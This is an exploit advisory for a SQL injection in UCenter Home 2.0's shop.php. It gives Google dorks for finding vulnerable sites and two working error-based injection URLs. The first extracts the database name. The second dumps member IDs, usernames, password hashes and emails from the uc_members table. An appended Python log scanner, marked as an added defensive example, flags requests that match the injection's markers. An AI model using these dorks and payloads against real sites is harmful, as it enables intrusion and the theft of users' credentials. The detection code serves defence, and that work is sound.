__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
value's : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim database name.
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
..
DB : Okey.
You edit DB `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okey.
You use Hex conversion. And edit your SQL Injection Exploit..
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
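
A defensive counterpart to the two request strings above, as an added example that is not part of the original advisory: it scans web access log lines for `shop.php?ac=view` requests whose `shopid` is not a plain integer and reports which error-based markers from the advisory's strings appear. The combined log format, the constructed sample lines, the integer-only assumption for `shopid` and the names `classify_request` and `scan` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Substrings taken from the two injection strings quoted in the advisory.
ERROR_BASED_MARKERS = ("information_schema", "floor(rand(", "group by",
                       "concat(", "unhex(")

# Request field of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_request(line):
    """Classify one access log line as (verdict, matched_markers).

    verdict: 'ok', 'non_numeric_shopid' or 'error_based_sqli'.
    Only shop.php?ac=view requests are inspected; anything else is 'ok'.
    """
    m = REQUEST_RE.search(line)
    if not m:
        return "ok", []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/shop.php"):
        return "ok", []
    params = parse_qs(url.query, keep_blank_values=True)  # URL-decodes values
    if params.get("ac") != ["view"]:
        return "ok", []
    # Assumption: a legitimate shopid is a plain integer, as in shopid=253.
    bad = [v.lower() for v in params.get("shopid", [])
           if not re.fullmatch(r"[0-9]+", v)]
    if not bad:
        return "ok", []
    hits = [mk for mk in ERROR_BASED_MARKERS if any(mk in v for v in bad)]
    return ("error_based_sqli" if hits else "non_numeric_shopid"), hits

# Constructed sample lines. The second abbreviates the advisory's probe
# (inner select replaced by "...") and is not a working request.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(...,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /shop.php?ac=view&shopid=12abc HTTP/1.1" 200 800',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?shopid=abc HTTP/1.1" 200 100',
]

def scan(lines):
    """Return (line_number, verdict, markers) for every non-'ok' line."""
    rows = [(n, *classify_request(l)) for n, l in enumerate(lines, 1)]
    return [r for r in rows if r[1] != "ok"]

if __name__ == "__main__":
    for row in scan(SAMPLE_LOG):
        print(row)
```

The same integer-only rule, enforced in the application before `shopid` reaches the query (an integer cast or a bound parameter), is what removes the injection point rather than just detecting its use.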